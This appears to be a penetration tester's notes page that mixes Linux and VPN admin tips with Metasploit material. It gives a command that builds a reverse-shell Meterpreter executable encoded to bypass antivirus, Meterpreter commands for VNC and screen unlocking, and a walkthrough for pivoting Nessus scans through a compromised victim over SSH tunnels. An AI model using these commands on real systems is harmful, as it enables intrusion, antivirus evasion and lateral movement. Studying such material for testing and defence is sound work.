Meterpreter VNC and Screen unlock

Note: May need to run vnc twice due to some bugs.

meterpreter > run vnc

meterpreter > run screen_unlock

Bypassing AV with msfencode

Example of encoding with shikata, 10 iterations.

./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=8888 r | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o novacoast_encoded.exe

Screen

#screen

#[run cmd]

#[ctrl+A, ctrl+D]

#screen -r //return to session

#screen -ls //list sessions

Configuring Cisco VPN client on Ubuntu/BT4

Source:

Directly copy and pasted:

http://www.ubuntugeek.com/how-to-setup-cisco-vpn-using-vpnc-ubuntu-jaunty-9-04.html

Client config:

https://help.ubuntu.com/community/VPNClient

* Download cisco-decrypt file which will be used to decrypt the group password from your pcf file:

wget http://www.debuntu.org/files/cisco-decrypt.c

sudo apt-get install libgcrypt11-dev

gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags)

chmod +x cisco-decrypt

sudo cp cisco-decrypt /usr/bin

* Download pcf2vpnc to convert pcf files in vpnc configuration format

wget http://svn.unix-ag.uni-kl.de/vpnc/trunk/pcf2vpnc

chmod +x pcf2vpnc

sudo cp pcf2vpnc /usr/bin

* Go to windows vpn profiles directory and convert .pcf files to .conf files

pcf2vpnc cisco.pcf > cisco.conf

Note:replace above cisco.pcf with your own .pcf file.

sudo cp cisco.conf /etc/vpnc/

* install vpnc and connect to vpn

sudo apt-get install vpnc resolvconf

sudo vpnc cisco

Enter username for :
Enter password for :
VPNC started in background (pid: 6092)…

* To disconnect simply do

sudo vpnc-disconnect

After your VPN has been established then connect to your remote desktop

Go to Applications >> Internet >> Terminal server client

Or

In terminal run

tsclient

Use sed to remove whitespace

Use Sed to Remove whitespace

#cat [file.txt] | sed -e 's/^[ \t]*//'

VIM delete from line number to line number

:[start_line_#],[end_line_#]d

Cut last field

Cut the last field off each line:

$cat [input_file ] | cut -f3-

Symantec SIM Command Line DB2 Backups

As db2admin:

#/opt/Symantec/simserver/simdbmu/bin/simbackup.sh full ONLINE

Scanning through Meterpreter and SSH Tunnel

By Mark Baggett


The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).


Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.